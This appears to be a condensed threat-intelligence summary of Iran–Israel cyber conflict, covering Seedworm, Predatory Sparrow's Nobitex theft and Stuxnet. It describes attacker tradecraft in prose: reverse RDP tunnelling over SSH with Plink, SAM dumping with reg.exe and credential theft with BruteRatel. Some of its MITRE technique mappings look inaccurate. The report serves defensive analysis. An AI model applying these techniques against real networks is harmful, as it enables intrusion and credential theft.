Threat Research

Is Cyber the Next Stage of War in the Middle East Conflict?

Symantec
Is Cyber the Next Stage of War in the Middle East Conflict?

The ongoing Middle East conflict involves escalating cyber warfare between Iran and Israel, highlighted by groups like Seedworm and attacks such as the Predatory Sparrow operation on Iranian crypto exchange Nobitex. Notably, Seedworm conducts espionage and destructive attacks, leveraging compromised devices and tools like BruteRatel to infiltrate and traverse target networks. #Seedworm #PredatorySparrow #Stuxnet

Keypoints

  • The Middle East conflict includes significant cyber warfare activity between Iran and Israel alongside physical hostilities.
  • Stuxnet was a pioneering cyberattack targeting Iranian nuclear enrichment centrifuges, showcasing destructive cyber capabilities.
  • Pro-Israel hackers dubbed Predatory Sparrow drained $90 million from the Iranian crypto exchange Nobitex.
  • The Iranian threat actor Damselfly conducts targeted phishing campaigns against high-profile Israeli individuals.
  • Seedworm (aka MuddyWater) is a prolific Iranian cyber espionage group, also engaging in destructive ransomware-like attacks using DarkBit.
  • Seedworm recently used compromised home routers infected with Mirai malware to proxy attacks and bypass geographic IP tracing.
  • The group employed tools like Plink, BruteRatel, and reg.exe to establish persistence, obtain credentials, and conduct lateral movement to access SQL and file servers.

MITRE Techniques

  • [T1040] Network Sniffing – Seedworm scanned vulnerable IIS servers via compromised home routers.
  • [T1071.001] Application Layer Protocol: Web Protocols – Used Plink tool to create reverse RDP tunnels through outbound SSH connections to bypass firewalls (‘create an outbound SSH connection… that connection is then used to tunnel classic RDP traffic’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Used reg.exe to dump the SAM database and obtain credentials (‘obtained more credentials using reg.exe, by dumping the SAM’).
  • [T1110] Brute Force – Used BruteRatel tool to obtain credentials for lateral movement (‘used BruteRatel… to obtain credentials’).
  • [T1190] Exploit Public-Facing Application – Seedworm exploited known vulnerabilities in IIS servers to gain access (‘used a variety of known vulnerabilities to then gain access’).
  • [T1021.001] Remote Services: Remote Desktop Protocol – Established lateral movement via reverse RDP tunnels using Plink (‘created a reverse RDP tunnel… bypassing the firewall’).

Indicators of Compromise

  • [File Hashes] Malware samples and tools – Mirai malware samples used to compromise home routers, BruteRatel commercial tool.
  • [File Names] Malicious tools – Plink used for tunneling RDP traffic, reg.exe used for credential dumping.
  • [Domains] Target – Iranian crypto exchange Nobitex was attacked by Predatory Sparrow group.
  • [IP Addresses] Network access points – Attacks proxied through numerous compromised home routers worldwide, avoiding direct Iranian IP addresses.

Read more: https://www.security.com/threat-intelligence/cyber-war-middle-east